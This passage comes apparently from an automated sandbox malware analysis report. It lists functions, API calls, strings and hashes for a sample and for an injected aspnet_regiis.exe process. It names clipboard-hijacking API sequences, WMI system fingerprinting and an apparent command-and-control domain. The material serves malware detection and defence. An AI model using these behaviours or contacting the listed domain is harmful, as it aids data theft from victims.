GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE21A02
FreeLibrary.KERNEL32(00000000,?,?,6CE2198C,?,?,6CE21954,?,00000001,?), ref: 6CE21A25

Strings

mscoree.dll, xrefs: 6CE219E8
CorExitProcess, xrefs: 6CE219FA

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9e36dcad0473470b4dfb4432ccd50279b4a8d9a4c6c42cb3ab4f84259208b297
Instruction ID: ac0310f99d3bb5b4eccc353342894b6fcfe96910b99f332c968b8282f96425ef
Opcode Fuzzy Hash: 9e36dcad0473470b4dfb4432ccd50279b4a8d9a4c6c42cb3ab4f84259208b297
Instruction Fuzzy Hash: 7BF01C72642118FBDF11AB90CD09F9EBA79EB4175AF204464E401B2651CB3DCF01DB91

Function 6CE25FF8 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CE2607C
__alloca_probe_16.LIBCMT ref: 6CE26142
__freea.LIBCMT ref: 6CE261AE

Part of subcall function 6CE251AC: HeapAlloc.KERNEL32(00000000,6CE24EE3,6CE24EE3,?,6CE23BE3,00000220,?,6CE24EE3,?,?,?,?,6CE27002,00000001,?,?), ref: 6CE251DE

__freea.LIBCMT ref: 6CE261B7
__freea.LIBCMT ref: 6CE261DA

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: a8a32946c3ddeb789704d8d81097bfe2608281f64d6f7a8efbab6e12628c8684
Instruction ID: 306abcdd802e1f951bfddd546147c0ddf61664955eed95d15f2c87676e88776d
Opcode Fuzzy Hash: a8a32946c3ddeb789704d8d81097bfe2608281f64d6f7a8efbab6e12628c8684
Instruction Fuzzy Hash: 2551C072501616ABEF218F548C41FAB36BDDF8575CF310219F918D7B41EB38EC1186A0

Function 6CE27546 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6CE2755E

Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B

_free.LIBCMT ref: 6CE27570
_free.LIBCMT ref: 6CE27582
_free.LIBCMT ref: 6CE27594
_free.LIBCMT ref: 6CE275A6

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1fe2c661f01ec57c7b807e3410b509241dab44b0cb3f28909504c3cd37852ecd
Instruction ID: 1bd0e2aa2755ad574e2562a9e81d785ed6c6459dd8f3ec29f193d2a7bb19bb4a
Opcode Fuzzy Hash: 1fe2c661f01ec57c7b807e3410b509241dab44b0cb3f28909504c3cd37852ecd
Instruction Fuzzy Hash: 81F062319552149BCB11DB64E489EA7B3F9BB5432D3704849F464DBF00C738F980CAE4

Function 6CE26F6D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CE26700: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE26748

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CE24EE3,?,00000000,00000000,6CE2F360,0000002C,6CE24F54,?), ref: 6CE270B3
GetLastError.KERNEL32 ref: 6CE270BD
__dosmaperr.LIBCMT ref: 6CE270FC

Strings

TOl, xrefs: 6CE26F6F

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
String ID: TOl
API String ID: 910155933-2836345119
Opcode ID: d655123d3dea7d044b16025a19aca2ec4a22b3e58815691a0847328624681f2e
Instruction ID: a02f41a2d8402425c168586c03c54564dd27e7be6e8e3dd95c77354279cc3d73
Opcode Fuzzy Hash: d655123d3dea7d044b16025a19aca2ec4a22b3e58815691a0847328624681f2e
Instruction Fuzzy Hash: 6751D372A50109ABEF11CFA4C845FDEBBB9AF4632CF340149E400ABB91D7799946CB60

Function 6CE22F37 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CE23559: _free.LIBCMT ref: 6CE23567

Part of subcall function 6CE2412D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE261A4,?,00000000,00000000), ref: 6CE241D9

GetLastError.KERNEL32 ref: 6CE22F9F
__dosmaperr.LIBCMT ref: 6CE22FA6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE22FE5
__dosmaperr.LIBCMT ref: 6CE22FEC

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: c30b69f66d4d6c494b616acb32daecbee48a485bd5dc2e52b2e458ccd4ec6b1e
Instruction ID: dc5487761630d3c5e526ece63fe1ba3a31640e240e977fe221a544cb66b8424b
Opcode Fuzzy Hash: c30b69f66d4d6c494b616acb32daecbee48a485bd5dc2e52b2e458ccd4ec6b1e
Instruction Fuzzy Hash: F521F4716142096FEB208F668884F5BB7BDEF1537C7248618F82897B40D77DEC018BA0

Function 6CE22837 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6CE26B48,?,00000001,6CE24F54,?,6CE27002,00000001,?,?,?,6CE24EE3,?,00000000), ref: 6CE2283C
_free.LIBCMT ref: 6CE22899
_free.LIBCMT ref: 6CE228CF
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CE27002,00000001,?,?,?,6CE24EE3,?,00000000,00000000,6CE2F360,0000002C,6CE24F54), ref: 6CE228DA

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d03a8ed0e9cf7d44e3ca72d09b20f5297750e7803434a8a777a3bdfa13c78b8f
Instruction ID: 035e5db1ce176887cfa519db6096fe7497fd8275d18a6550437a7604a18caf12
Opcode Fuzzy Hash: d03a8ed0e9cf7d44e3ca72d09b20f5297750e7803434a8a777a3bdfa13c78b8f
Instruction Fuzzy Hash: AF1102367606042ADB0652B59C8CF6B3379EFE267D7340229F62086BC0FF6CC8099260

Function 6CE2298E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,6CE22DC8,6CE22E59,?,?,6CE2206C), ref: 6CE22993
_free.LIBCMT ref: 6CE229F0
_free.LIBCMT ref: 6CE22A26
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CE22DC8,6CE22E59,?,?,6CE2206C), ref: 6CE22A31

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6f12800d1daef58435bf04d689ccbc03e4cb6339df923cb4b97f9e917ccaefee
Instruction ID: dfca575f8b82d32d8b167308ff6714ceea58ee5966d8ba4027b4d8fcb624175c
Opcode Fuzzy Hash: 6f12800d1daef58435bf04d689ccbc03e4cb6339df923cb4b97f9e917ccaefee
Instruction Fuzzy Hash: 031148367645042ACB0256B89C8CF5B3379AFE267C7340328F92082BC0FF2D8809A564

Function 6CE27D96 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001), ref: 6CE27DAD
GetLastError.KERNEL32(?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001,?,00000001,?,6CE27023,6CE24EE3), ref: 6CE27DB9

Part of subcall function 6CE27D7F: CloseHandle.KERNEL32(FFFFFFFE,6CE27DC9,?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001,?,00000001), ref: 6CE27D8F

___initconout.LIBCMT ref: 6CE27DC9

Part of subcall function 6CE27D41: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE27D70,6CE277DE,00000001,?,6CE26AD7,?,?,00000001,?), ref: 6CE27D54

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001,?), ref: 6CE27DDE

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a7bf9f3081f9236ade42816366d476db88f2f1e7547b7cd8d4decb15b3778b65
Instruction ID: 412de0cac276560e900bbab95cbbd3293a961473709356f61037d1a1f6531560
Opcode Fuzzy Hash: a7bf9f3081f9236ade42816366d476db88f2f1e7547b7cd8d4decb15b3778b65
Instruction Fuzzy Hash: 54F0C036644128BBCF135FD6CC04F9A7FB6FF0B3A5B144114FA1995620DB7A8820EB95

Function 6CE22164 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6CE2216D

Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B

_free.LIBCMT ref: 6CE22180
_free.LIBCMT ref: 6CE22191
_free.LIBCMT ref: 6CE221A2

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c1d74eb37e5734801c70296b743e75e2f0b92deefa7753794346d83378d0fe42
Instruction ID: 0eeeb112d88771d47e5f2b3e49a2d77c742f3ab5cd5f80047eb249287e262eea
Opcode Fuzzy Hash: c1d74eb37e5734801c70296b743e75e2f0b92deefa7753794346d83378d0fe42
Instruction Fuzzy Hash: E2E04F70720130BA8F13FF58E4448963B79BBAAF10310908AF4040AB10C7350313EFE1

Function 6CE21A68 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\9cOUjp7ybm.exe, xrefs: 6CE21AAB, 6CE21AB2, 6CE21AE8

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\9cOUjp7ybm.exe
API String ID: 0-3504642391
Opcode ID: fd59b3e4c30bc45bb2fff6d13333369b14d4c2afacf7485425b64587442cf8ec
Instruction ID: 3190cd138731894407f65150cce71d82e370f35e12e872825549ed26158f95b7
Opcode Fuzzy Hash: fd59b3e4c30bc45bb2fff6d13333369b14d4c2afacf7485425b64587442cf8ec
Instruction Fuzzy Hash: DC415071B00214ABDB12DB998980A9EBBBCEB86718B3000AAE40497750E7758F45CBA0

Function 6CE265E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CE264A0: EnterCriticalSection.KERNEL32(00000001,?,6CE26EDF,?,6CE2F400,00000010,6CE24FF7,00000000,00000000,?,?,?,?,6CE2503B,?,00000000), ref: 6CE264BB

FlushFileBuffers.KERNEL32(00000000,6CE2F3E0,0000000C,6CE266E8,TOl,?,00000001,?,6CE24F54,?), ref: 6CE2662A
GetLastError.KERNEL32 ref: 6CE2663B

Strings

TOl, xrefs: 6CE26662

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: TOl
API String ID: 4109680722-2836345119
Opcode ID: 0bb44cc026f98efc833940360436065f032c0bffc743eadd88eda4d2555cd70e
Instruction ID: 0abe8bc5553a9260736b0ab305aeb1e1d495fd870a4dd9611bcdc3bcee3bd50b
Opcode Fuzzy Hash: 0bb44cc026f98efc833940360436065f032c0bffc743eadd88eda4d2555cd70e
Instruction Fuzzy Hash: 94015E72A10254DFCB019FA8D845B9DBBB8EF49728F24461EE411DB7A0DB7C99018B90

Analysis Process: aspnet_regiis.exePID: 7696, Parent PID: 7616COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	27%
Total number of Nodes:	355
Total number of Limit Nodes:	23

Executed Functions

Function 027A2120 Relevance: 131.6, APIs: 3, Strings: 71, Instructions: 2148COMMON

Download Yara Rule

Strings

W, xrefs: 027A29F4
`, xrefs: 027A3041
Q, xrefs: 027A3B1B
', xrefs: 027A3789
=, xrefs: 027A29FC
', xrefs: 027A29CC
%, xrefs: 027A3779
D, xrefs: 027A3C8E
\, xrefs: 027A2A1C
9, xrefs: 027A2AD9
A, xrefs: 027A346C
U, xrefs: 027A29E4
{, xrefs: 027A2AE3
I, xrefs: 027A343C
(, xrefs: 027A2DF7
%, xrefs: 027A3ACB
p, xrefs: 027A342C
#, xrefs: 027A3769
:, xrefs: 027A27D3
!, xrefs: 027A3ABB
S, xrefs: 027A2A14
D, xrefs: 027A4034
x, xrefs: 027A2F85
%, xrefs: 027A2DDF
M, xrefs: 027A36B9
}, xrefs: 027A344C
D, xrefs: 027A4027
k, xrefs: 027A29D4
6, xrefs: 027A3A6B
i, xrefs: 027A29C4
3, xrefs: 027A3A4B
+, xrefs: 027A37A9
?, xrefs: 027A3749
<, xrefs: 027A3A3B
8, xrefs: 027A39DB
;, xrefs: 027A3729
y, xrefs: 027A2F75
), xrefs: 027A3799
O, xrefs: 027A36C9
I, xrefs: 027A3699
$, xrefs: 027A26EE
K, xrefs: 027A36A9
a, xrefs: 027A3B2B
!, xrefs: 027A2DBF
=, xrefs: 027A3739
g, xrefs: 027A3B3B
Q, xrefs: 027A2A04
], xrefs: 027A2A24
1, xrefs: 027A36D9
:, xrefs: 027A2ADE
J, xrefs: 027A2386
/, xrefs: 027A37C9
#, xrefs: 027A2DCF
7, xrefs: 027A3709
5, xrefs: 027A36F9
3, xrefs: 027A36E9
i, xrefs: 027A217A
4, xrefs: 027A3A5B
v, xrefs: 027A3242
), xrefs: 027A2DFF
;, xrefs: 027A39FB
!, xrefs: 027A3759
(, xrefs: 027A3AEB
o, xrefs: 027A29B4
C, xrefs: 027A345C
q, xrefs: 027A341C
-, xrefs: 027A37B9
', xrefs: 027A2DEF
%, xrefs: 027A3A9B
6, xrefs: 027A3641
9, xrefs: 027A3719

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: !$!$!$#$#$$$%$%$%$%$'$'$'$($($)$)$+$-$/$1$3$3$4$5$6$6$7$8$9$9$:$:$;$;$<$=$=$?$A$C$D$D$D$I$I$J$K$M$O$Q$Q$S$U$W$\$]$`$a$g$i$i$k$o$p$q$v$x$y${$}
API String ID: 0-2157806064
Opcode ID: f4c4cb05a5163970f4d8e5b738e630a31ffaeb8cc8e52eba09b61fdb5094d6f3
Instruction ID: c03868e0b341892a98068d7559529917e02e8a1b6fe39c066d9bdb7be5d17c4b
Opcode Fuzzy Hash: f4c4cb05a5163970f4d8e5b738e630a31ffaeb8cc8e52eba09b61fdb5094d6f3
Instruction Fuzzy Hash: CB13AD3150C7C18AD3359A38886839BBBE2ABD6324F088B6DE4E9973D2D7798445C753

Function 027C8890 Relevance: 32.3, APIs: 11, Strings: 7, Instructions: 781
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(027D268C,00000000,00000001,027D267C,00000000), ref: 027C8BCC
SysAllocString.OLEAUT32(-X*^), ref: 027C8C2B
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 027C8C6B
SysAllocString.OLEAUT32(PX), ref: 027C8CBC
SysAllocString.OLEAUT32(1FDB1DCF), ref: 027C8D4B
VariantInit.OLEAUT32(CCCFCEE9), ref: 027C8DB7
SysFreeString.OLEAUT32(?), ref: 027C9079
SysFreeString.OLEAUT32(?), ref: 027C907F
SysFreeString.OLEAUT32(?), ref: 027C9092
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 027C90C7

Strings

-X*^, xrefs: 027C8C15
YdB3, xrefs: 027C8C89
#fw, xrefs: 027C8B99
7, xrefs: 027C89A8
adB3, xrefs: 027C8CB0
,\)B, xrefs: 027C8BE5
2=, xrefs: 027C8CEC

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: #fw$,\)B$-X*^$2=$7$YdB3$adB3
API String ID: 2247799857-2780812687
Opcode ID: 487bcf36ff6941c42779fb23f31da46b4c52a29b96f58d5b9b65755773456585
Instruction ID: 8c48b49fc11af2fbe05983aac9f7f370584342795822d33e15053fac898b0405
Opcode Fuzzy Hash: 487bcf36ff6941c42779fb23f31da46b4c52a29b96f58d5b9b65755773456585
Instruction Fuzzy Hash: 0842F372A083518BD714CF24C8807ABBBE2EFC5314F298A2DE5D59B391D775D806CB92

Function 04D31000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 04D31032
OpenClipboard.USER32(00000000), ref: 04D3103C
GetClipboardData.USER32(0000000D), ref: 04D3104C
GlobalLock.KERNEL32(00000000), ref: 04D3105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 04D31090
GlobalLock.KERNEL32 ref: 04D310A0
GlobalUnlock.KERNEL32 ref: 04D310C1
EmptyClipboard.USER32 ref: 04D310CB
SetClipboardData.USER32(0000000D), ref: 04D310D6
GlobalFree.KERNEL32 ref: 04D310E3
GlobalUnlock.KERNEL32(?), ref: 04D310ED
CloseClipboard.USER32 ref: 04D310F3
GetClipboardSequenceNumber.USER32 ref: 04D310F9

Memory Dump Source

Source File: 00000002.00000002.2942123190.0000000004D31000.00000020.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true

Associated: 00000002.00000002.2942074432.0000000004D30000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2942137443.0000000004D32000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d30000_aspnet_regiis.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: b091036d13516a36684fdfa6720ffd880e7c147ab0538cf7b0856b4b103b7446
Instruction ID: fab8d93d87757fd767e6d15c6fc35ae4f30bc47deb1597c00631ed2e1ec7657e
Opcode Fuzzy Hash: b091036d13516a36684fdfa6720ffd880e7c147ab0538cf7b0856b4b103b7446
Instruction Fuzzy Hash: D1217131B042629BDB202B71AC09B6E77A8FF04787F04047CF985D6251EB35AC00C6A2

Function 027A5270 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 917
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)I&K, xrefs: 027A56D3
'2/B, xrefs: 027A5C3C
" &, xrefs: 027A595C
XY, xrefs: 027A56FF
+E%G, xrefs: 027A56C8
U3W, xrefs: 027A56F4
y, xrefs: 027A5971

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: U3W$" &$'2/B$)I&K$+E%G$XY$y
API String ID: 0-81430434
Opcode ID: 660030e394920426c88a2b0359f9693122f8923b1cdfce6d4fb55fbf2a91a630
Instruction ID: ded872a438b2b4b0c8eba42fc895c4886b63ac94323b1c6972164078c336557a
Opcode Fuzzy Hash: 660030e394920426c88a2b0359f9693122f8923b1cdfce6d4fb55fbf2a91a630
Instruction Fuzzy Hash: 535214B19493818FD721CF24D8957ABB7F2FFC5324F588A2DE4899B251E7349801CB92

Function 0279D6C5 Relevance: 8.2, APIs: 2, Strings: 3, Instructions: 652
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0279D6D1
CoUninitialize.COMBASE ref: 0279DAE7

Strings

undesirabkel.click, xrefs: 0279DAB7, 0279DEF8
)./, xrefs: 0279DB9D
VMNO, xrefs: 0279DDED

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: )./$VMNO$undesirabkel.click
API String ID: 3861434553-3526534237
